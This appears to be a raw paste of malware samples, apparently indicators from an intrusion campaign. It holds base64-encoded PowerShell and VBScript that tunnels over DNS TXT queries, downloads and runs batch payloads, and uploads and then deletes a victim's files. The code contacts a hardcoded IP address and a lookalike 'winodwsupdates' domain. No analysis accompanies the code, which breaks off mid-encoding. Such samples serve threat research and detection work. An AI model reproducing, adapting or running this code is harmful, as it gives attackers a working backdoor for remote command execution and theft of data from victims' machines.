ICAgJGdsb2JhbDpyZWdGaWxlbmFtZSA9ICIiDQogICAgJGNvbnRpbnVlID0gIFtpbnRdIDANCiAgICB3aGlsZSAoJGNvbnRpbnVlIC1lcSAwICkNCiAgICB7ICAgICAgICANCiAgICAgICAgJHJlZ0V4aXN0ZW5jZSA9IFtpbnRdIC0xICAgICAgICAgDQogICAgICAgIHdoaWxlICgkcmVnRXhpc3RlbmNlIC1lcSAtMSkNCiAgICAgICAgew0KICAgICAgICAgICAgJHNlbmREYXRhID0gInJuZV8iICsgKFtzdHJpbmddJGlkKS5yZXBsYWNlKCJfIiwiLSIpICsgIl8iICsoW3N0cmluZ10oR2V0LVJhbmRvbSAtbWluaW11bSAxIC1tYXhpbXVtIDEwMDAxKSkgKyAiLiIgKyAoW3N0cmluZ10kZ2xvYmFsOmhvc3RuYW1lKSAgICAgICAgICAgICANCiAgICAgICAgICAgICRzZXJ2ZXJSZXQgPSAoW3N0cmluZ10oTlNMb29rdXAuZXhlIC1xPVRYVCAgJHNlbmREYXRhICB8IFNlbGVjdC1TdHJpbmcgLVBhdHRlcm4gJyIqIicpKS5yZXBsYWNlKCJgIiIsIiIpLnRyaW0oKTsgICAgICAgICAgICAgICAgICAgICAgICANCiAgICAgICAgICAgIGlmICgkc2VydmVyUmV0LlN0YXJ0c1dpdGgoIk9LIikpIyBvay1maWxlbmFtZQ0KICAgICAgICAgICAgew0KICAgICAgICAgICAgICAgICRyZWdFeGlzdGVuY2UgPSBbaW50XSAxOw0KICAgICAgICAgICAgICAgICRnbG9iYWw6cmVnRmlsZW5hbWUgPSAkc2VydmVyUmV0LnN1YnN0cmluZygyLCRzZXJ2ZXJSZXQuTGVuZ3RoIC0gMikucmVwbGFjZSgiXy1fIiwiLiIpLnRyaW0oKSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgICAgICAgICB9RWxzZUlmICgkc2VydmVyUmV0IC1lcSAiTk8iKQ0KICAgICAgICAgICAgeyAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICRyZWdFeGlzdGVuY2UgPSBbaW50XSAwOw0KICAgICAgICAgICAgICAgICRjb250aW51ZSA9IFtpbnRdIDE7DQogICAgICAgICAgICB9DQogICAgICAgIH0gICANCiAgICAgICAgICAgICAgICAgICAgICAgICANCiAgICAgICAgaWYgKCRyZWdFeGlzdGVuY2UgLWVxIDEgLWFuZCAkZ2xvYmFsOnJlZ0ZpbGVuYW1lIC1uZSAiIikNCiAgICAgICAgew0KICAgICAgICAgICAgIz09PT09PT09PT0gZG93bmxvYWQgcmVndWxhciBmaWxlID09PT09PT09PT09PT09PT09PT09ICAgICAgICAgICAgDQogICAgICAgICAgICAkc2VydmVyUmV0ID0gIiIgICAgDQogICAgICAgICAgICAkcmVndWxhckZpbGVQYXRoID0gICgkZ2xvYmFsOmRGb2xkKSArICJcIiArKCRnbG9iYWw6cmVnRmlsZW5hbWUpDQogICAgICAgICAgICANCiAgICAgICAgICAgIGlmICgtbm90IChUZXN0LVBhdGggJHJlZ3VsYXJGaWxlUGF0aCkpDQogICAgICAgICAgICB7DQogICAgICAgICAgICAgICAgb3V0LW51bGwgPiAkcmVndWxhckZpbGVQYXRoICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgICAgICAgICB9DQogICAgICAgICAgICAgICAgDQogICAgICAgICAgICB3aGlsZSgkc2VydmVyUmV0IC1uZSAiRU9GRU9GIikNCiAgICAgICAgICAgIHsNCiAgICAgICAgICAgICAgICAkcmVndWxhcmZpbGVzaXplID0gKEdldC1JdGVtICRyZWd1bGFyRmlsZVBhdGgpLmxlbmd0aA0KICAgICAgICAgICAgICAgICRzZW5kRGF0YSA9ICJyZF8iICsgKFtzdHJpbmddJGlkKS5yZXBsYWNlKCJfIiwiLSIpICsgIl8iICsgKCRnbG9iYWw6cmVnRmlsZW5hbWUpLnJlcGxhY2UoIi4iLCJfLV8iKSArICJfIiArIChbc3RyaW5nXSRyZWd1bGFyZmlsZXNpemUpICsgIl8iICsoW3N0cmluZ10oR2V0LVJhbmRvbSAtbWluaW11bSAxIC1tYXhpbXVtIDEwMDAxKSkgKyIuIiArIChbc3RyaW5nXSRnbG9iYWw6aG9zdG5hbWUpIA0KICAgICAgICAgICAgICAgICRzZXJ2ZXJSZXQgPSAoW3N0cmluZ10oTlNMb29rdXAuZXhlIC1xPVRYVCAgJHNlbmREYXRhICB8IFNlbGVjdC1TdHJpbmcgLVBhdHRlcm4gJyIqIicpKS5yZXBsYWNlKCJgIiIsIiIpLnRyaW0oKTsgICAgICAgIA0KICAgICAgICAgICAgICAgICRzZXJ2ZXJSZXQNCiAgICAgICAgICAgICAgICBpZiAoJHNlcnZlclJldCAtbmUgIkVPRkVPRiIpDQogICAgICAgICAgICAgICAgew0KICAgICAgICAgICAgICAgICAgICAgICAkYjY0RGF0YSA9ICRzZXJ2ZXJSZXQucmVwbGFjZSgiXyIsIisiKS5yZXBsYWNlKCItIiwiLyIpOw0KICAgICAgICAgICAgICAgICAgICAgICAkcGFkZGluZ1JlcSA9ICg0IC0gKCRiNjREYXRhLkxlbmd0aCAlIDQpKSAlIDQ7DQogICAgICAgICAgICAgICAgICAgICAgIGZvciAoJGk9MDsgJGkgLWx0ICRwYWRkaW5nUmVxOyAkaSsrKQ0KICAgICAgICAgICAgICAgICAgICAgICB7DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgJGI2NERhdGEgKz0gICI9Ig0KICAgICAgICAgICAgICAgICAgICAgICB9DQogICAgICAgICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICAgICAgICAkZGF0YSA9IFtTeXN0ZW0uSU8uRmlsZV06OlJlYWRBbGxCeXRlcygkcmVndWxhckZpbGVQYXRoKSAgKyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRiNjREYXRhKQ0KICAgICAgICAgICAgICAgICAgICAgICANCiAgICAgICAgICAgICAgICAgICAgICAgW2lvLmZpbGVdOjpXcml0ZUFsbEJ5dGVzKCRyZWd1bGFyRmlsZVBhdGgsJGRhdGEpICAgICAgICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgIH0NCiAgICAgICAgICAgIH0NCiAgICAgICAgICAgIA0KICAgICAgICB9DQogICAgfQ0KICAgIA0KICAgIA0KIz09PT09PT09PT09PT09PSBkb3dubG9hZCBiYXRjaCBmaWxlID09PT09PT09PT09PT09PT09PQ0KICAgICM9PT09PT09PT09PSBleGlzdGVuY2UgYmF0Y2ggZmlsZSA9PT09PT09PT09PT09PT09PT0NCiAgICAkZ2xvYmFsOmJhdGNoRmlsZW5hbWUgPSAiIiAgICAgICAgDQogICAgJGJhdGNoRXhpc3RlbmNlID0gW2ludF0gLTEgICAgICAgICANCgl3aGlsZSAoJGJhdGNoRXhpc3RlbmNlIC1lcSAtMSkNCgl7DQoJCSRzZW5kRGF0YSA9ICJibmVfIiArIChbc3RyaW5nXSRpZCkucmVwbGFjZSgiXyIsIi0iKSArICJfIiArKFtzdHJpbmddKEdldC1SYW5kb20gLW1pbmltdW0gMSAtbWF4aW11bSAxMDAwMSkpICsgIi4iICsgKFtzdHJpbmddJGdsb2JhbDpob3N0bmFtZSkgDQoJCSRzZXJ2ZXJSZXQgPSAoW3N0cmluZ10oTlNMb29rdXAuZXhlIC1xPVRYVCAgJHNlbmREYXRhIHwgU2VsZWN0LVN0cmluZyAtUGF0dGVybiAnIioiJykpLnJlcGxhY2UoImAiIiwiIikudHJpbSgpOyAgICAgICAgDQogICAgICAgICRzZXJ2ZXJSZXQNCgkJaWYgKCRzZXJ2ZXJSZXQuU3RhcnRzV2l0aCgiT0siKSkjIG9rLWZpbGVuYW1lDQoJCXsNCgkJCSRiYXRjaEV4aXN0ZW5jZSA9IFtpbnRdIDE7DQoJCQkkZ2xvYmFsOmJhdGNoRmlsZW5hbWUgPSAkc2VydmVyUmV0LnN1YnN0cmluZygyLCRzZXJ2ZXJSZXQuTGVuZ3RoIC0gMikucmVwbGFjZSgiXy1fIiwiLiIpLnRyaW0oKSAgICAgICAgICAgICAgICAgICAgICAgICAgICANCiAgICAgICAgICAgICRnbG9iYWw6YmF0Y2hGaWxlbmFtZQ0KCQl9RWxzZUlmICgkc2VydmVyUmV0IC1lcSAiTk8iKQ0KCQl7DQoJCQkkYmF0Y2hFeGlzdGVuY2UgPSBbaW50XSAwOyAgICAgICAgDQoJCX0NCgl9ICAgIA0KCWlmICgkYmF0Y2hFeGlzdGVuY2UgLWVxIDEgLWFuZCAkZ2xvYmFsOmJhdGNoRmlsZW5hbWUgLW5lICIiKQ0KCXsNCgkJIz09PT09PT09PT0gZG93bmxvYWQgYmF0Y2ggZmlsZSA9PT09PT09PT09PT09PT09PT09PQ0KCQkkc2VydmVyUmV0ID0gIiIgICAgDQoJCSRiYXRjaEZpbGVQYXRoID0gICgkZ2xvYmFsOmRGb2xkKSArICJcIiArKCRnbG9iYWw6YmF0Y2hGaWxlbmFtZSkNCiAgICAgICAgaWYgKC1ub3QgKFRlc3QtUGF0aCAkYmF0Y2hGaWxlUGF0aCkpDQogICAgICAgIHsNCiAgICAgICAgICAgIG91dC1udWxsID4gJGJhdGNoRmlsZVBhdGggICAgICAgICAgICAgICAgICAgICAgICANCiAgICAgICAgfQkJICAgICAgICAgICAgICAgICAgICAgDQoJCXdoaWxlKCRzZXJ2ZXJSZXQgLW5lICJFT0ZFT0YiKQ0KCQl7DQoJCQkkYmF0Y2hmaWxlc2l6ZSA9IChHZXQtSXRlbSAkYmF0Y2hGaWxlUGF0aCkubGVuZ3RoDQoJCQkkc2VuZERhdGEgPSAiYmRfIiArIChbc3RyaW5nXSRpZCkucmVwbGFjZSgiXyIsIi0iKSArICJfIiArICgkZ2xvYmFsOmJhdGNoRmlsZW5hbWUpLnJlcGxhY2UoIi4iLCJfLV8iKSArICJfIiArIChbc3RyaW5nXSRiYXRjaGZpbGVzaXplKSArICJfIiArKFtzdHJpbmddKEdldC1SYW5kb20gLW1pbmltdW0gMSAtbWF4aW11bSAxMDAwMSkpICsiLiIgKyAoW3N0cmluZ10kZ2xvYmFsOmhvc3RuYW1lKSANCgkJCSRzZXJ2ZXJSZXQgPSAoW3N0cmluZ10oTlNMb29rdXAuZXhlIC1xPVRYVCAgJHNlbmREYXRhIHwgU2VsZWN0LVN0cmluZyAtUGF0dGVybiAnIioiJykpLnJlcGxhY2UoImAiIiwiIikudHJpbSgpOyAgICAgICAgDQoJCQlpZiAoJHNlcnZlclJldCAtbmUgIkVPRkVPRiIpDQoJCQl7DQoJCQkJICAgJGI2NERhdGEgPSAkc2VydmVyUmV0LnJlcGxhY2UoIl8iLCIrIikucmVwbGFjZSgiLSIsIi8iKTsNCgkJCQkgICAkcGFkZGluZ1JlcSA9ICg0IC0gKCRiNjREYXRhLkxlbmd0aCAlIDQpKSAlIDQ7DQoJCQkJICAgZm9yICgkaT0wOyAkaSAtbHQgJHBhZGRpbmdSZXE7ICRpKyspDQoJCQkJICAgew0KCQkJCQkJJGI2NERhdGEgKz0gICI9Ig0KCQkJCSAgIH0NCgkJCQkgICANCiAgICAgICAgICAgICAgICAgICAkZGF0YSA9IFtTeXN0ZW0uSU8uRmlsZV06OlJlYWRBbGxCeXRlcygkYmF0Y2hGaWxlUGF0aCkgICsgW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkYjY0RGF0YSkgICAgICAgICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICAgIFtpby5maWxlXTo6V3JpdGVBbGxCeXRlcygkYmF0Y2hGaWxlUGF0aCwkZGF0YSkNCgkJCX0NCgkJfQ0KDQoJCVJlbmFtZS1JdGVtICRiYXRjaEZpbGVQYXRoCSgkYmF0Y2hGaWxlUGF0aCsiLmJhdCIpDQoJCSRiYXRjaEZpbGVQYXRoID0gJGJhdGNoRmlsZVBhdGgrIi5iYXQiDQoJCQ0KICAgICAgICBpZiAoJHNlcnZlclJldCAtZXEgIkVPRkVPRiIpDQogICAgICAgIHsgICAgICAgICAgICAgICAgICAgICAgDQogICAgICAgICAgICBJbnZva2UtRXhwcmVzc2lvbiAoJGJhdGNoRmlsZVBhdGggKyAnID4gJyArICRnbG9iYWw6dUZvbGQgKyAnXCcgKyAkZ2xvYmFsOmJhdGNoRmlsZW5hbWUgKyAnX2JhdCcpOw0KICAgICAgICAgICAgZGVsICRiYXRjaEZpbGVQYXRoDQogICAgICAgIH0gICAgICAgDQoJfQ0KDQoNCiMgPT09PT09PT09PT09PT0gdXBsb2FkIGZvbGRlciBjb250ZW50ID09PT09PT09PT09PT09PT09PT0NCkdldC1DaGlsZEl0ZW0gJGdsb2JhbDp1Rm9sZCAtZm9yY2UgfCAgICUgew0KICAgICRfLkZ1bGxOYW1lIA0KICAgICRfLk5hbWUgDQogICAgJEJhc2U2NCA9IFtjb252ZXJ0XTo6VG9CYXNlNjRTdHJpbmcoKGdldC1jb250ZW50ICRfLkZ1bGxOYW1lIC1lbmNvZGluZyBieXRlKSkucmVwbGFjZSgiICIsIiIpLnJlcGxhY2UoIisiLCJfIikucmVwbGFjZSgiLyIsIi0iKS5yZXBsYWNlKCI9IiwiIikgI2dldCBiYXNlNjQgYW5kIGNvbnZlcnQgKyB0byBfIGFuZCAvIHRvIC0NCiAgICAjJEJhc2U2NCB8IG91dC1maWxlIGU6XGVlZS50eHQgLUVuY29kaW5nICJBU0NJSSINCiAgICAgDQogICAgJHNlbmRlZCA9IFtpbnRdMA0KICAgIA0KICAgIHdoaWxlICgkc2VuZGVkIC1sdCAoJEJhc2U2NC5MZW5ndGggLTEpKQ0KICAgIHsgICAgICAgIA0KICAgICAgICAkc2VuZERhdGEgPSAgInVfIiArKChbc3RyaW5nXSRpZCkucmVwbGFjZSgiXyIsIi0iKSArICJfIiArIChbc3RyaW5nXSRfLk5hbWUpLnJlcGxhY2UoIl8iLCItIikgICArICJfIiArIChbc3RyaW5nXSRzZW5kZWQpLnJlcGxhY2UoIl8iLCItIikpLnJlcGxhY2UoIi4iLCJfLV8iKSAgKyAiXyIgKyAoW3N0cmluZ10oR2V0LVJhbmRvbSAtbWluaW11bSAxIC1tYXhpbXVtIDEwMDAxKSkgKyAiLiIjIGlkICsgZmlsZW5hbWUgKyBzZW5kZWRzaXplDQogICAgICAgIA0KICAgICAgICBpZiAoKCRzZW5kZWQgKyAkbWF4aG9zdGxlbmd0aCkgLWxlICgkQmFzZTY0Lkxlbmd0aCAtIDEpKQ0KICAgICAgICB7DQogICAgICAgICAgICAkc2VuZERhdGEgPSAkc2VuZERhdGEgKyAkQmFzZTY0LnN1YnN0cmluZygkc2VuZGVkLCRtYXhob3N0bGVuZ3RoKQ0KICAgICAgICB9DQogICAgICAgIGVsc2UNCiAgICAgICAgew0KICAgICAgICAgICAgJHNlbmREYXRhID0gJHNlbmREYXRhICsgJEJhc2U2NC5zdWJzdHJpbmcoJHNlbmRlZCwgJEJhc2U2NC5MZW5ndGggLSAkc2VuZGVkICkgICAgICAgICAgICANCiAgICAgICAgfQ0KICAgICAgICAkc2VuZERhdGEgPSAkc2VuZERhdGEgKyAiLiIgKyAoW3N0cmluZ10kZ2xvYmFsOmhvc3RuYW1lKSAgICAgICAgDQogICAgICAgICRzZXJ2ZXJSZXQgPSAoW3N0cmluZ10oTlNMb29rdXAuZXhlIC1xPVRYVCAgJHNlbmREYXRhIHwgU2VsZWN0LVN0cmluZyAtUGF0dGVybiAnIioiJykpLnJlcGxhY2UoImAiIiwiIikudHJpbSgpOw0KICAgICAgICANCiAgICAgICAgaWYgKCRzZXJ2ZXJSZXQuU3RhcnRzV2l0aCgiT0siKSkNCiAgICAgICAgew0KICAgICAgICAgICAgJHNlbmRlZCA9IFtpbnRdKCRzZXJ2ZXJSZXQuc3Vic3RyaW5nKDIsJHNlcnZlclJldC5MZW5ndGggLSAyKS50cmltKCkpICAgICAgICAgICAgDQogICAgICAgIH0gICANCiAgICAgICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIA0KICAgIH0NCiAgICBpZiAoJHNlbmRlZCAtZ2UgICgkQmFzZTY0Lkxlbmd0aCAtMSkpDQogICAgew0KICAgICAgICAkc2VuZERhdGEgPSAgInVfIiArKChbc3RyaW5nXSRpZCkucmVwbGFjZSgiXyIsIi0iKSArICJfIiArIChbc3RyaW5nXSRfLk5hbWUpLnJlcGxhY2UoIl8iLCItIikgICArICJfIiArIChbc3RyaW5nXSRzZW5kZWQpLnJlcGxhY2UoIl8iLCItIikpLnJlcGxhY2UoIi4iLCJfLV8iKSArICJfIiArKFtzdHJpbmddKEdldC1SYW5kb20gLW1pbmltdW0gMSAtbWF4aW11bSAxMDAwMSkpICsgIi4iICsiRU9GRU9GIiArICIuIiArIChbc3RyaW5nXSRnbG9iYWw6aG9zdG5hbWUpIA0KICAgICAgICAkc2VydmVyUmV0ID0gKFtzdHJpbmddKE5TTG9va3VwLmV4ZSAtcT1UWFQgICRzZW5kRGF0YSB8IFNlbGVjdC1TdHJpbmcgLVBhdHRlcm4gJyIqIicpKS5yZXBsYWNlKCJgIiIsIiIpLnRyaW0oKTsNCiAgICAgICAgaWYgKCRzZXJ2ZXJSZXQgLWVxICJPSyIpDQogICAgICAgIHsNCiAgICAgICAgICAgIGRlbCAkXy5GdWxsTmFtZQ0KICAgICAgICB9DQogICAgfQ0KICAgICAgICANCn0NCmV4aXQ=')); Add-Content 'C:\Users\User1\AppData\Local\Microsoft\Media\dn.ps1' $fdn; (Get-Content 'C:\Users\User1\AppData\Local\Microsoft\Media\dn.ps1') -replace '__',('DN'+$id) |  Set-Content  'C:\Users\User1\AppData\Local\Microsoft\Media\dn.ps1' ;} "  --> Set wss = CreateObject("W__Script.S__hell")HOME = CreateObject("Scripting.FileSystemObject").GetParentFolderName(WScript.ScriptFullName) & "\" '"%userprofile%\AppData\Local\Microsoft\Media\"SERVER="http://178.33.94.47:2050/update.php?req=__"Dwn= "powershell "" " & _     " &{$wc=(new-object System.Net.WebClient); " & _      "while(1){try{$r=Get-Random ;$wc.DownloadFile('" _     & SERVER & _     "&m=d','" & HOME & "dn\'+$r+'.-_');" & _     " Rename-Item -path ('"  & _      HOME & _      "dn\'+$r+'.-_') -newname " & _       "($wc.ResponseHeaders['Content-Disposition'].Substring(" & _      "$wc.ResponseHeaders['Content-Disposition'].Indexof('filename=')+9))}catch{break}}}"""wss.Run Replace(Dwn,"-_","dwn"),0DownloadExecute= "powershell "" " & _                 "&{$r=Get-Random; "& _                 "$wc=(new-object System.Net.WebClient);" & _                  "$wc.DownloadFile('" & SERVER & "&m=b','" & HOME&"dn\'+$r+'.-_');" & _                 "Invoke-Expression ('"& HOME&"dn\'+$r+'.-_ >" & HOME&"up\'+$r+'-_');" & _                 "Rename-Item -path ('" & HOME & _                 "up\'+$r+'-_') -newname ($wc.ResponseHeaders['Content-Disposition'].Substring(" & _                  "$wc.ResponseHeaders['Content-Disposition'].Indexof('filename=')+9)+'.txt');" & _                 "Get-ChildItem " & HOME & "up\ | ForEach-Object "& _                 "{if((Get-Item($_.FullName)).length -gt 0){$wc.UploadFile('" & _                 SERVER & _                 "&m=u',$_.FullName)};" & _                 "Remove-Item $_.FullName};Remove-Item ('"& HOME & "dn\'+$r+'.-_')}"""wss.Run Replace(DownloadExecute,"-_","bat"),0dnsCmd = "powershell -executionpolicy bypass -file " & HOME & "dn.ps1"wss.Run dnsCmd,0
  22. 55d0e12439b20dadb5868766a5200cbbe1a06053bf9e229cf6a852bfcf57d579
  23. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "&{$f=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('SE9NRT0iJXB1YmxpYyVcTGlicmFyaWVzXCIKU0VSVkVSPSJodHRwOi8vd2lub2R3c3VwZGF0ZXMubWUvY291bnRlci5hc3B4P3JlcT1fX1wiCkR3bj0icG93ZXJzaGVsbCAiIiZ7JHdjPShuZXctb2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KTt3aGlsZSgxKXt0cnl7JHI9R2V0LVJhbmRvbTskd2MuRG93bmxvYWRGaWxlKCciJlNFUlZFUiYiLV8mbT1kJywnIiZIT01FJiJkblwnKyRyKycuLV8nKTsgU2V0LUNvbnRlbnQgLVBhdGggKCciJkhPTUUmImRuXCcrJHIrJy4tXycpIC1WYWx1ZSAoW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygoR2V0LUNvbnRlbnQgLVBhdGggKCciJkhPTUUmImRuXCcrJHIrJy4tXycpKSkpIC1FbmNvZGluZyBCeXRlOyBSZW5hbWUtSXRlbSAtcGF0aCAoJyImSE9NRSYiZG5cJyskcisnLi1fJykgLW5ld25hbWUgKCR3Yy5SZXNwb25zZUhlYWRlcnNbJ0NvbnRlbnQtRGlzcG9zaXRpb24nXS5TdWJzdHJpbmcoJHdjLlJlc3BvbnNlSGVhZGVyc1snQ29udGVudC1EaXNwb3NpdGlvbiddLkluZGV4T2YoJ2ZpbGVuYW1lPScpKzkpKX1jYXRjaHticmVha319fSIiIgpDcmVhdGVPYmplY3QoIldTY3JpcHQuU2hlbGwiKS5SdW4gUmVwbGFjZShEd24sIi1fIiwiZHduIiksMApEb3dubG9hZEV4ZWN1dGU9InBvd2Vyc2hlbGwgIiImeyRyPUdldC1SYW5kb207JHdjPShuZXctb2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KTskd2MuRG93bmxvYWRGaWxlKCciJlNFUlZFUiYiLV8mbT1kJywnIiZIT01FJiJkblwnKyRyKycuLV8nKTsgU2V0LUNvbnRlbnQgLVBhdGggKCciJkhPTUUmImRuXCcrJHIrJy4tXycpIC1WYWx1ZSAoW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygoR2V0LUNvbnRlbnQgLVBhdGggKCciJkhPTUUmImRuXCcrJHIrJy4tXycpKSkpIC1FbmNvZGluZyBCeXRlOyBJbnZva2UtRXhwcmVzc2lvbiAoJyImSE9NRSYiZG5cJyskcisnLi1fID4iJkhPTUUmInVwXCcrJHIrJy1fJyk7IFJlbmFtZS1JdGVtIC1wYXRoICgnIiZIT01FJiJ1cFwnKyRyKyctXycpIC1uZXduYW1lICgkd2MuUmVzcG9uc2VIZWFkZXJzWydDb250ZW50LURpc3Bvc2l0aW9uJ10uU3Vic3RyaW5nKCR3Yy5SZXNwb25zZUhlYWRlcnNbJ0NvbnRlbnQtRGlzcG9zaXRpb24nXS5JbmRleE9mKCdmaWxlbmFtZT0nKSs5KSsnLnR4dCcpOyBHZXQtQ2hpbGRJdGVtICImSE9NRSYidXBcIHwgRm9yRWFjaC1PYmplY3Qge2lmKChHZXQtSXRlbSAoJF8uRnVsbE5hbWUpKS5sZW5ndGggLWd0IDApe1tTeXN0ZW0uQ29udmVydF06OlRvQmFzZTY0U3RyaW5nKChHZXQtQ29udGVudCAtUGF0aCAkXy5GdWxsTmFtZSAtRW5jb2RpbmcgQnl0ZSkpIHwgT3V0LUZpbGUgJF8uRnVsbE5hbWU7JHdjLlVwbG9hZEZpbGUoJyImU0VSVkVSJiJ1cGwmbT11JywkXy5GdWxsTmFtZSk7d2FpdGZvciBoYWhhIC9UIDN9O1JlbW92ZS1JdGVtICRfLkZ1bGxOYW1lfTtSZW1vdmUtSXRlbSAoJyImSE9NRSYiZG5cJyskcisnLi1fJyl9IiIiCkNyZWF0ZU9iamVjdCgiV1NjcmlwdC5TaGVsbCIpLlJ1biBSZXBsYWNlKERvd25sb2FkRXhlY3V0ZSwiLV8iLCJiYXQiKSwwCkRuc0NtZD0icG93ZXJzaGVsbCAtRXhlY3V0aW9uUG9saWN5IEJ5cGFzcyAtRmlsZSAiJkhPTUUmImRucy5wczEiCkNyZWF0ZU9iamVjdCgiV1NjcmlwdC5TaGVsbCIpLlJ1biBEbnNDbWQsMA==')); Add-Content 'C:\Users\Public\Libraries\update.vbs' $f;$f=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JGdsb2JhbDpteWhvc3QgPSAnLndpbm9kd3N1cGRhdGVzLm1lJwokZ2xvYmFsOmZpbGVuYW1lID0gJycKJGdsb2JhbDpteWZsYWcgPSAwCiRnbG9iYWw6bXlpZCA9ICcjIyMnCiRnbG9iYWw6bXlob21lID0gIiRlbnY6UHVibGljXExpYnJhcmllc1wiCmZ1bmN0aW9uIGNvbnZlcnRUby1CYXNlMzYgKCRkZWNOdW09IiIpCnsKICAgICRkZWNOdW0gJT0gNDY2NTYKICAgICRhbHBoYWJldCA9ICIwMTIzNDU2Nzg5QUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVoiCiAgICBkbwogICAgewogICAgICAgICRyZW1haW5kZXIgPSAoJGRlY051bSAlIDM2KQogICAgICAgICRjaGFyID0gJGFscGhhYmV0LnN1YnN0cmluZygkcmVtYWluZGVyLDEpCiAgICAgICAgJGJhc2UzNk51bSA9ICIkY2hhciRiYXNlMzZOdW0iCiAgICAgICAgJGRlY051bSA9ICgkZGVjTnVtIC0gJHJlbWFpbmRlcikgLyAzNgogICAgfQogICAgd2hpbGUgKCRkZWNOdW0gLWd0IDApCiAgICAkYmFzZTM2TnVtLlBhZExlZnQoMywnMCcpCn0KZnVuY3Rpb24gR2V0U3ViKCRteWZsYWcyLCAkY21kaWQ9JzAwJywgJHBhcnRpZD0nMDAwJykKewogICAgaWYoJG15ZmxhZzIgLWVxIDApCiAgICB7CiAgICAoJzAwMDAwMDAwJysoY29udmVydFRvLUJhc2UzNihHZXQtUmFuZG9tIC1NYXhpbXVtIDQ2NjU1KSkpCiAgICB9CiAgICBlbHNlaWYoJG15ZmxhZzIgLWVxIDEpCiAgICB7CiAgICAgICAgKCcwMCcrJGdsb2JhbDpteWlkKycwMDAwMCcrKGNvbnZlcnRUby1CYXNlMzYoR2V0LVJhbmRvbSAtTWF4aW11bSA0NjY1NSkpKQogICAgfQogICAgZWxzZWlmKCRteWZsYWcyIC1lcSAyKQogICAgewogICAgICAgICgnMDAnKyRnbG9iYWw6bXlpZCskY21kaWQrJHBhcnRpZCsoY29udmVydFRvLUJhc2UzNihHZXQtUmFuZG9tIC1NYXhpbXVtIDQ2NjU1KSkpCiAgICB9Cn0KZnVuY3Rpb24gU3RyMkhleCgkbXlzdHIpCnsKICAgIFtTeXN0ZW0uQml0Q29udmVydGVyXTo6VG9TdHJpbmcoW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6RGVmYXVsdC5HZXRCeXRlcygkbXlzdHIpKS5SZXBsYWNlKCItIiwgIiIpCn0KZnVuY3Rpb24gQWxpdmUKewoJaWYoJGdsb2JhbDpteWlkIC1lcSAnIycrJyMjJykKCXsKCQlyZXR1cm4gMAoJfQogICAgU2VuZFJlY2VpdmVETlMgKChHZXRTdWIgMSkrJzMwJykKICAgICRzdWIgPSAoKEdldFN1YiAxKSsnMjMyQScpICsgKFN0cjJIZXggJGdsb2JhbDpmaWxlbmFtZSkKICAgICRpID0gMQogICAgJHJldCA9IDAKICAgIHdoaWxlKCRnbG9iYWw6bXlmbGFnIC1lcSAxKQogICAgewogICAgICAgICRyZXQgPSAxCiAgICAgICAgJHN1YjIgPSAkc3ViICsgKFN0cjJIZXggJGkpCiAgICAgICAgU2VuZFJlY2VpdmVETlMgJHN1YjIKICAgICAgICAkaSsrCiAgICB9CiAgICBpZigkcmV0IC1lcSAxKQogICAgew